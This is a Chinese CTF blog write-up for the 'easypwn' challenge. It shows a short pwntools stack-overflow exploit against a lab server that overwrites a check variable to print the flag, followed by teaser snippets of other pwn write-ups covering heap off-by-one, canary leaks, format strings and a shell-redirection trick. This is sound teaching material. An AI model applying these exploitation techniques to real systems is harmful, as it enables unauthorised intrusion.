easypwn

最新推荐文章于 2024-07-18 12:30:00 发布
最新推荐文章于 2024-07-18 12:30:00 发布
阅读量276 收藏
点赞数 2
分类专栏: ctf 文章标签: 安全 unctf web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zip471642048/article/details/121664727
版权

esaypwn

下载题目文件是一个elf64位可执行文件
用IDA64打开
在这里插入图片描述
if那里进行了判断要让dword_60106C==1853186401就会调用下面那个方法
直接getflag

在这里插入图片描述
查看堆栈,利用堆栈溢出执行方法
在这里插入图片描述

溢出4个字符构造exp,得到flag

from pwn import *
p = remote('172.22.253.196',8888)
p.recvuntil('lets get')
p.sendline('a'*4+'aaun')
p.interactive()

在这里插入图片描述

[mzq]
关注
专栏目录
WICCTF-2021-easypwn
05-12
2021津门杯ctf的第一道pwn题。
攻防世界PWN之EasyPwn题解
seaaseesa的博客
11-15 3798
EasyPwn 首先,看一下程序的保护机制 开启了CANARY、NX和PIE,RELRO部分开启,我们可以改写GOT表 然后,我们用IDA分析 read的maxsize参数比变量的空间大小要小,因此无法溢出到栈底,加上开启了PIE,因此排除了ROP的方法 我们再仔细观察一下,发现snprintf在执行的过程中,v2可以溢出到v3,而v3存储的是格式化字符串,因此,我们可以溢出v2...
HNCTF2024-easypwn
最新发布
sagic的博客
07-18 193
我们可以执行 exec 1>&0,也就是把标准输出重定向到标准输入,因为默认打开一个终端后,0,1,2都指向同一个位置也就是当前终端,所以这条语句相当于重启了标准输出,此时就可以执行命令并且看得到输出了。0是标准输入,1是标准输出,2是标准错误。
攻防世界easypwn
weixin_44447516的博客
08-01 525
攻防世界 EasyPwn
roarctf_2019_easy_pwn
hanabi_sh
12-20 535
buuctf pwn roarctf_2019_easy_pwn off-by-one
[BUUCTF]-PWN:roarctf_2019_easy_pwn解析
2301_79326813的博客
02-03 1451
先看保护64位,got表不可写看ida大致就是alloc创建堆块,fill填充堆块,free释放堆块,show输出堆块内容这里要注意的点有以下alloc创建堆块:这里采用的是calloc而不是malloc,calloc在创建堆块时会初始化也就是清空相应的内存空间,而malloc不会,这里使用calloc创建堆块fill填充堆块:这里它限制了填充的字节大小不得超过堆块大小,但如果填充大小正好大于堆块10字节的话,就可以多溢出一个字节,存在off by one漏洞。
new-easy(pwn)
m0_72827793的博客
03-12 1300
由于栈溢出攻击的主要目标通过溢出覆盖函数栈高位的返回地址,因此其思路是在函数开始执行前,即在返回地地址前写入一个字长的随机数据,在函数返回前校验该值是否被改变,如果被改变,则认为是发生了栈溢出。与ASLR保护十分类似,PIE保护的目的是让可执行程序ELF的地址进行随机化加载,从而使得程序的内存结构对攻击者完全未知,进一步提高程序的安全性。ASLR的目的是将程序的堆栈地址和动态链接库的加载地址进行一定的随机化,这些地址之间是不可读写执行的为映射内存,降低攻击者对程序内存结构的了解。
[BUUCTF]PWN——roarctf_2019_easy_pwn(详解)
mcmuyanga的博客
12-18 2312
roarctf_2019_easy_pwn 附件 步骤: 例行检查,64位程序,保护全开 试运行一下程序,看看大概的情况,经典的堆块的菜单 64位ida载入,改了一下各个选项的函数名,方便看程序(按N) add edit free show 这道题通过 offbyone来构造重叠chunk,达到任意地址分配chunk的效果,然后修改__realloc_hook地址处的内容为one gadget地址,修改malloc_hook地址处的内容为ralloc函数的地址+x 我们先申
2022赣育杯easypwn
qingan6的博客
11-14 210
2022赣育杯easypwn writeup
攻防世界-Pwn-new-easypwn
wuh2333的博客
03-12 3965
攻防世界-Pwn-new-easypwn
“百度杯“ 十二月场 easypwn
baiyeguang的博客
03-14 700
题目链接 程序分析 查看程序保护机制 开启了canary保护,想办法绕过,这里选择泄露canary 可以看出canary的位置在[rbp-8]处,接着想办法泄露出[rbp-8]处数据 从源码中可以看出此处可以栈溢出,且canary位置为0x50-8,由于程序在接收到我们的输入之后会返回回来,所以如果我们可以覆盖掉canary低位的0x00就可以将canary一起打印出来,这里如果我们用sen...
Ichunqiu_Easypwn
钞sir的博客
01-28 4031
轮回池前彼岸花 三生石旁那道疤 擦不去的眼中莎 泪眼迷离失去她 https://cc-sir.github.io/2019/01/28/ichunqiu_easypwn/ 方法 这道题是i春秋CTF的一道题,也是“百度杯”CTF比赛 十二月场中的一道pwn,这道题比较简单 我们先看看这道题的保护机制: sir@sir-PC:~/desktop$ checksec easypwn [*] '/ho...
roarctf_2019_easy_pwn[off by one]
、moddemod
07-01 352
溢出一个字节,修改size域 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() def create_note(size, ): p.sendlineafter('choice:', str(1)) p.sendlineafter('size:', str(size)) def write_note(index,...
RoarCTF easy_pwn writeup
qq_43189757的博客
10-13 3035
漏洞点: 在write note 中,如果再输入一次size的大小比创建note时的大小的差值为10, 则读入的数据会比chunk的size多一,也就造成了off-by-one漏洞 漏洞利用思路: 大体路线: **1.**修改chunk1 的size为0xf1 **2.**修改chunk3的size为0xa1, 之后free掉, 再create一个size为0x20 的chunk,由于修改了ch...
pwn 网鼎杯 easyFMT
SsMing的博客
09-01 2013
作为一个菜狗子只能等大佬的writeup学习   才会做 easyFMT看名字就是到是格式化串洞,然后就是要确定存在格式化串洞的参数是第几个 确定为是print的第六个参数 大佬计算参数的脚本是: #!/usr/bin/python from pwn import * elf = ELF('./pwn') for i in xrange(1,100): p = proce...
[BUUCTF]PWN——roarctf_2019_easy_pwn
qq_51687381的博客
07-29 277
白天睡觉,晚上来写道题。 这道题涉及了unsortedbins,malloc_hook,堆溢出。 heap的菜单选项常规题,做到目前为止,主要是两个思路: 先check,根据RELRO。如果为full,那么就需要malloc_hook。如果为partial,就直接更改got表就可以了。 在create函数中可以明显看出来这是个结构体 一个结构体有24个字节,前8个为标志位,中间8个size位,后8个是alloc出来的chunk的指针。 (alloc和malloc不同的是 alloc的fr
i春秋上的几道pwn题
sopora的博客
06-17 1745
01.pwnme-50: Tag: fmtstr任意读 / 整型溢出 / ret2csu_init #encoding:utf-8 from pwn import * #context.log_level = 'debug' def leak(addr): io.sendafter('>', '2') io.sendafter('username...
CISCN2020 PWNwp
starssgo的博客
08-21 2085
国赛嘛,不想说啥 这里写目录babyjscmajeasyboxsnofreewow总结 babyjsc 非预期,python的input命令执行漏洞 # -*- coding: utf-8 -* from pwn import * from LibcSearcher import * context.log_level = 'debug' context.arch = 'amd64' p = 0 def pwn(ip,port,debug): p = remote(ip,port) payload='
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值